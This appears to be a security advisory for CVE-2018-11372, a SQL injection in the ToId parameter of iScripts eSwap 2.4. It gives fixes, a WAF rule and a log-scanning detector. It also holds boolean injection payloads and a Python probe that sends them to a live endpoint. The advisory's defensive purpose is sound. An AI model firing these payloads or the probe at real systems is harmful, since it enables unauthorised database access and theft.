CVE-2018-11372

9.8 CRITICAL

📋 TL;DR

CVE-2018-11372 is a SQL injection vulnerability in iScripts eSwap v2.4 that allows attackers to execute arbitrary SQL commands via the ToId parameter in wishlistdetailed.php. This affects all users of the vulnerable software version, potentially compromising the entire database.

💻 Affected Systems

Products:
  • iScripts eSwap
Versions: 2.4
Operating Systems: All platforms running PHP/MySQL
Default Config Vulnerable: ⚠️ Yes
Notes: Requires PHP/MySQL environment. The vulnerability exists in the default installation.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise: theft or manipulation of all application data, authentication bypass (for example by reading password hashes or altering account rows), and, if the application's MySQL account holds the FILE privilege, writing files into the web root (SELECT ... INTO OUTFILE) for remote code execution.

🟠

Likely Case

Unauthorized data access, extraction of sensitive user information, and potential privilege escalation.

🟢

If Mitigated

Limited impact with proper input validation and parameterized queries in place.

🌐 Internet-Facing: HIGH - The vulnerable endpoint is accessible via the user panel, making internet-facing instances particularly vulnerable.
🏢 Internal Only: MEDIUM - Internal instances are still vulnerable but have reduced attack surface compared to internet-facing deployments.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ❌ No (a logged-in user session is required)
Complexity: LOW

Exploitation requires a logged-in user session to reach the wishlistdetailed.php endpoint in the user panel; once authenticated the injection is straightforward (a single parameter, no encoding or filtering to bypass). Note that the 9.8 score shown above corresponds to a CVSS v3 vector with no privileges required; if your deployment does require authentication for this endpoint, the effective score for the same impact is 8.8 (low privileges), but treat it as critical until you have confirmed that.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Version 2.5 or later

Vendor Advisory: https://www.iscripts.com/

Restart Required: No

Instructions:

1. Upgrade to iScripts eSwap v2.5 or later.
2. Apply vendor-provided patches if available.
3. Replace wishlistdetailed.php with the patched version.
4. Test the wishlist functionality after the update.

🔧 Temporary Workarounds

Input Validation Filter

Applies to: all platforms

Add server-side validation, before the query runs, so that the ToId parameter is accepted only as a positive integer. Plain is_numeric() is too loose for an ID (it accepts "1e3", leading whitespace and signs); validate as an integer and use the validated value, not $_GET, afterwards.

// PHP example: place at the top of wishlistdetailed.php, before ToId reaches any query
$toId = filter_input(INPUT_GET, 'ToId', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($toId === null || $toId === false) { http_response_code(400); die('Invalid input'); }
// from here on use $toId (an int), ideally as a bound parameter of a prepared statement

WAF Rule

Applies to: all platforms

Implement a web application firewall rule that blocks SQL injection patterns in this parameter. A WAF is a stopgap: it reduces exposure but can be bypassed, so it does not replace the patch or the input validation above.

# ModSecurity example (libinjection-based @detectSQLi operator, ModSecurity 2.7.6+ / v3):
SecRule ARGS:ToId "@detectSQLi" "id:1001,phase:2,deny,status:403,log,msg:'SQLi attempt in ToId (CVE-2018-11372)'"

🧯 If You Can't Patch

  • Restrict access to the wishlistdetailed.php endpoint until a patch is applied, for example by allowing only trusted source IPs at the reverse proxy or by disabling the wishlist feature
  • Run the application with a MySQL account that holds only the privileges it needs on its own schema (no FILE, SUPER or DDL rights; read-only where the feature allows), so that an injection cannot write files to disk or reach other databases

🔍 How to Verify

Check if Vulnerable:

On a system you are authorised to test, log in as a normal user and request the endpoint with a true/false pair, e.g. wishlistdetailed.php?ToId=1 AND 1=1 versus wishlistdetailed.php?ToId=1 AND 1=2 (URL-encode the spaces; also try the quoted forms 1' AND '1'='1 and 1' AND '1'='2). If the first response matches the normal page and the second differs, the parameter is injectable. A bare payload such as wishlistdetailed.php?ToId=1' OR '1'='1 is a weaker test because the page may look the same either way; a database error message in the response is itself a positive indicator.
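The true/false comparison above, written out as a small probe. This is an added example, not code from the original page or from iScripts; the base URL, the Cookie header carrying the user session, and the two stub "targets" used to exercise it offline are assumptions. The stubs emulate an unvalidated numeric query and a patched endpoint respectively; against a real target, responses that embed dynamic content (CSRF tokens, timestamps) need more normalisation than the whitespace collapse used here.

```python
import urllib.error
import urllib.request
from urllib.parse import urlencode


def make_fetcher(base_url, cookie_header, timeout=10):
    """Build a fetch(value) -> (status, body) callable for a real target.

    base_url is the directory containing wishlistdetailed.php (hypothetical,
    e.g. 'https://shop.example/user'); cookie_header is the logged-in session
    cookie, since the endpoint requires authentication.
    """
    def fetch(value):
        url = f"{base_url}/wishlistdetailed.php?{urlencode({'ToId': value})}"
        req = urllib.request.Request(url, headers={'Cookie': cookie_header})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode('utf-8', 'replace')
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode('utf-8', 'replace')
    return fetch


def _norm(resp):
    """Collapse whitespace so layout noise does not mask a real difference."""
    status, body = resp
    return status, ' '.join(body.split())


def probe_toid(fetch, known_id):
    """Boolean-based check: a true condition must reproduce the baseline page
    and a false one must change it. Tried for an unquoted numeric context
    (WHERE id=$ToId) and a quoted one (WHERE id='$ToId')."""
    baseline = _norm(fetch(str(known_id)))
    contexts = {}
    for name, true_payload, false_payload in (
        ('numeric', f'{known_id} AND 1=1', f'{known_id} AND 1=2'),
        ('quoted', f"{known_id}' AND '1'='1", f"{known_id}' AND '1'='2"),
    ):
        t = _norm(fetch(true_payload))
        f = _norm(fetch(false_payload))
        contexts[name] = (t == baseline and t != f)
    return {'injectable': any(contexts.values()), 'contexts': contexts}


# Constructed stand-ins for a target so the probe can be exercised offline.
def vulnerable_stub(value):
    """Emulates `WHERE ToId=` + value with no quoting and no validation."""
    if value == '42' or value.endswith('AND 1=1'):
        return 200, '<h1>Wishlist</h1>\n<ul><li>item</li></ul>\n3 items'
    return 200, '<h1>Wishlist</h1>\n<ul></ul>\n0 items'


def hardened_stub(value):
    """Emulates the validated endpoint: anything non-numeric is rejected."""
    if value.isascii() and value.isdigit():
        return 200, '<h1>Wishlist</h1>\n<ul><li>item</li></ul>\n3 items'
    return 400, 'Invalid input'


if __name__ == '__main__':
    print('vulnerable stub:', probe_toid(vulnerable_stub, 42))
    print('hardened stub:  ', probe_toid(hardened_stub, 42))
    # real target: probe_toid(make_fetcher('https://shop.example/user', 'PHPSESSID=...'), 42)
```

The probe reports which context (numeric or quoted) responded to the condition, which tells you how the original query embeds the parameter; a hardened endpoint answers both the true and the false payload identically (here with a 400), so neither context is flagged.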

Check Version:

Check version in admin panel or review source code headers for version information

Verify Fix Applied:

Verify that SQL injection payloads no longer work and that input validation is properly implemented

📡 Detection & Monitoring

Log Indicators:

  • Unusual statements in the MySQL general or slow query log issued by the web application's database user (UNION SELECT, sleep()/benchmark(), reads of information_schema, SELECT ... INTO OUTFILE)
  • Multiple failed login attempts followed by access to wishlistdetailed.php from the same client
  • SQL syntax error messages in the application or PHP error logs, which indicate malformed injected input reaching the database

Network Indicators:

  • HTTP requests to wishlistdetailed.php with SQL injection patterns in parameters
  • Unusual database traffic from web server

SIEM Query:

source="web_logs" AND uri="*wishlistdetailed.php*" AND (param="*ToId=*'*" OR param="*ToId=*%27*")

This is a pseudo-query; adapt the field names to your platform. It only matches payloads that contain a quote character, so an unquoted numeric injection (ToId=1 OR 1=1, or its URL-encoded form) is missed. A more robust rule alerts on any request to wishlistdetailed.php whose ToId value is not a plain integer after URL decoding.
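The decode-then-validate rule described above, run over access logs. This is an added example, not part of the original page or of any vendor tooling; the log lines are constructed for illustration and the /user/ directory in them is assumed (the filter matches on the file name only). Because it decodes the parameter before checking it, it catches the quoted, the unquoted and the double-encoded variants alike, where the pattern-based SIEM query only catches the first.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache/nginx "combined" format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2018:10:01:02 +0000] "GET /user/wishlistdetailed.php?ToId=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2018:10:01:07 +0000] "GET /user/wishlistdetailed.php?ToId=42%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 9800 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2018:10:01:12 +0000] "GET /user/wishlistdetailed.php?ToId=42+OR+1%3D1 HTTP/1.1" 200 9800 "-" "Mozilla/5.0"
10.0.0.9 - - [12/May/2018:10:01:20 +0000] "GET /user/wishlistdetailed.php?ToId=42%2520UNION%2520SELECT%25201 HTTP/1.1" 200 9800 "-" "python-requests/2.18"
10.0.0.7 - - [12/May/2018:10:02:00 +0000] "GET /user/profile.php?ToId=42%27 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%2527, %2520) are compared as plain text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_clean_id(value):
    """The only legitimate shape of ToId is an ASCII decimal integer."""
    return value.isascii() and value.isdigit()


def find_toid_abuse(log_text):
    """Return one finding per wishlistdetailed.php request whose ToId is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        if not url.path.lower().endswith('/wishlistdetailed.php'):
            continue
        # parse_qs already removes one layer of encoding (and turns '+' into a space)
        for raw in parse_qs(url.query, keep_blank_values=True).get('ToId', []):
            decoded = decode_fully(raw)
            if not is_clean_id(decoded):
                findings.append({
                    'ip': m['ip'], 'ts': m['ts'], 'status': int(m['status']),
                    'raw': raw, 'decoded': decoded,
                })
    return findings


def sources(findings):
    """Count findings per client IP, the first pivot an analyst wants when triaging."""
    return Counter(f['ip'] for f in findings)


if __name__ == '__main__':
    hits = find_toid_abuse(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} status={h['status']} ToId={h['decoded']!r}")
    print(sources(hits))
```

The request to profile.php with a quote in ToId is deliberately not flagged: the rule is scoped to the vulnerable endpoint to keep the alert precise. The HTTP status is kept in each finding because a 200 on a malformed ToId, rather than a 400, tells you the input validation workaround is not in place.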
